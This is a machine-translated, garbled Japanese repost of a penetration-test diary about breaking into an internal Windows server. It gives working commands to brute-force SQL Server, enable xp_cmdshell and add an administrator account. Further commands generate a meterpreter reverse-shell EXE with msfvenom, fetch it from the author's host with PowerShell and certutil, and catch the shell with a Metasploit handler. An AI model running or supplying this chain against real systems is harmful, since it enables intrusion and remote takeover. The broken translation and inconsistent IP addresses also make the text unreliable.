[3]実際の戦闘の困難なプロセスは、シェルのネットワーク内のリバウンドを記録します

0x00の序文

顧客サイトの侵入テストでは、最近の内部ネットワーク・サーバは、このコースはここからで、弱いパスワードの多数を発見しました?

0x01の弱いパスワード

ターゲットIPポートスキャン、開いているポート80,445,1433,3389
-無駄にアクセスポート80が、正常にインストールインターフェイス、ソースコードの開示があるかどうかを確認するためにディレクトリをスキャンし、
-かどうかを確認するために、nmapのポートスキャンスクリプト445を使用しますms17010およびその他の脆弱性は、無駄に、存在して
SA / SA:、成功を爆破、弱いパスワードツールスーパー1433高炉の使用をパスワードアカウント-
無駄に、3389の同時爆破を-

Navicatは成功した接続SQL Serverデータベースを使用して、これ突破口を決定します

0x02のコネクタ3389

ビットを回し、データ、サーバは、それを取るため、新しいクエリを指示し、オープンxp_cmdshellをしようとしません。

EXEC sp_configureの' ショー高度なオプション'1 ; RECONFIGURE ; EXEC sp_configureの' xp_cmdshellを'1 ; RECONFIGURE ;

 

その後、コマンドを実行します

EXEC master..xp_cmdshell "にwhoami"。


これは、などのシステム権限である、と想像し
3389が開いている、直接リモートデスクトップバーを接続するためにユーザーを追加することをお勧めします


 

パスワードの強度を強化、再追加

幹部は「ネットmaster..xp_cmdshell ユーザーテストpaperpen123を。/ 追加します」;
幹部は「ネットLOCALGROUP管理者のテストmaster..xp_cmdshell / 追加します」;


すべては3389を接続するために開始し、順調に行くが、残念ながらされます



これは、単一のユーザーのみログインを許可する、win7のある彼の言葉を絞ることが判明した場合はプレーを続けることができない、または右コネクション3389をあきらめます

0x03のPowerShellのダウンロードのトロイの木馬

私はまだ操作しやすく、ローカル爆弾殻に来て、それを爆撃する方法を、単純に言いましたか?
ネットワークがインターネットにアクセスすることができない場合は、あなたが外部のネットワークダウンロードツールからコマンドを使用することができない、ということを強調しなければならない
、それは行うことができ、それを自分のサーバー上でツールをダウンロードするために私のローカルサーバから彼を聞かせ
が、ファイアウォールマシンをオフにします、アクセスの実装に失敗した後にのみ、それを考えること。私のIPは195.1.7.23です
exeファイルトロイの木馬を生成使用カーリー

msfvenom - P窓/ meterpreter / reverse_tcp LHOST = 195.17.23 lportは= 8888  - F EXE > SHELL.EXE


ローカルphpstudy迅速な環境を構築する
リンクがhttp://195.1.7.23/shell.exeし、サイトのルートにSHELL.EXE下
のローカルポート8888をリスニング

msf5 >  使用悪用/マルチ/ ハンドラを
(マルチ利用msf5 /ハンドラ)>  設定ペイロード窓/ meterpreter / reverse_tcp 
ペイロード=>ウィンドウ/ meterpreter / reverse_tcp 
msf5(マルチ悪用/ハンドラ)>  設定 LHOST 195.1を7.23 
LHOST =>  195.17.23 
msf5はエクスプロイト(マルチ/ハンドラ)>  セット lportは8888
lportは=>  8888 
msf5は(マルチエクスプロイト/ハンドラ)>活用


すべては彼がファイルサーバがSHELL.EXEを行い送信され、準備ができています。次のコマンド、カレンデュラは、およそおかげ提供私の友人のほとんど
、PowerShellコマンドをテストされていますが実行されるので、友人カレンデュラへのダウンロードコマンドの実行

EXEC master..xp_cmdshell "PowerShellの$クライアント=新しい- オブジェクトSystem.Net.WebClient"。
EXEC master..xp_cmdshell "PowerShellの$のclient.DownloadFile(' http://195.1.7.23/shell.exe '' SHELL.EXE ')";


これら二つは、実行するために合流できましたが、時間を見つけるために、以前の試みは、他のコマンドの長さの制限を実行します


だから、分割実行が、残念ながら、



何を理解していなかったのため利用できない場合があり、したがって、この方法を放棄しDownloadFile

0x04のダウンロード証明書

カレンデュラの友人は私がのcertutil.exeを使用して、新しいアイデアを提供した、突然の前代未聞、コマンドは以下のとおりである、ショックを受け:

幹部 master..xp_cmdshell ' のcertutil.exe -urlcache -split -f "http://195.1.7.23/shell.exe" ' ;


閲覧するには、dirを使用して、サーバー上の成功を見つけるためにダウンロードします


0x05のラリー成功

一歩後退し、次のコマンドと神経質にクリックされた実行を入力します。

幹部 master..xp_cmdshell ' SHELL.EXE ' ;


...スタック、再度実行して、立ち往生...、再度実行し、どのような???
、バックモニタ画面、プレスCTRL + C再meterpreterインターフェイスに結果を監視するために行きますそれが立ち往生することが判明しました?


 

興奮して写真をカット


 

一瞬見て、ドメイン環境ではありません



はいはい、長い道のりがまだあるようです。

0x06の結論

進捗状況が更新される場合は、今これを書いてください。あなたは、シェフメッセージを議論相互に通信し、一緒に互いにおよび進捗状況から学ぶことを歓迎します。

おすすめ

転載: www.cnblogs.com/paperpen/p/11469827.html